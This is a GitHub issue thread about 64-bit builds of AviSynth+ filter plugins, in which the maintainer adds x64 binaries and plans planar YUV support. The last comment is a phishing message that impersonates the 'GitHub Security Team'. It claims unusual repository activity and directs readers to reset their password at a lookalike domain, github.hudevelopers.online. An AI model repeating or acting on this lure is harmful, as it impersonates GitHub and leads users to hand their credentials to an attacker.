### ISSUE TITLE
Binaries?

### ISSUE THREAD

**Issue by Reel-Deal** [ladipro/avisynth_filters#1]
Hi, I was wondering if you can provide binaries for your plugins? 64-bit binaries for AviSynth+ would be very welcomed :).

Thanks

**Comment by ladipro** [comment]
Hi, I have added x64 binaries to the existing 1.0.0 releases. They seem to work fine with the latest/r1576 build of AviSynth+ running in 64-bit VirtualDub. Please let me know if this works for you.

**Comment by Reel-Deal** [comment]
x64 KevinColorShift is working properly, tried with AviSynth+ r1576 and AvsPmod. I haven't tried HealDeadPixels yet but I assume there should be no problems also.

One last thing, any plans on adding planar YUV support to KevinColorShift?

**Comment by ladipro** [comment]
Yes, definitely planning to add YUV support. I'll try to get it done as soon as possible.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
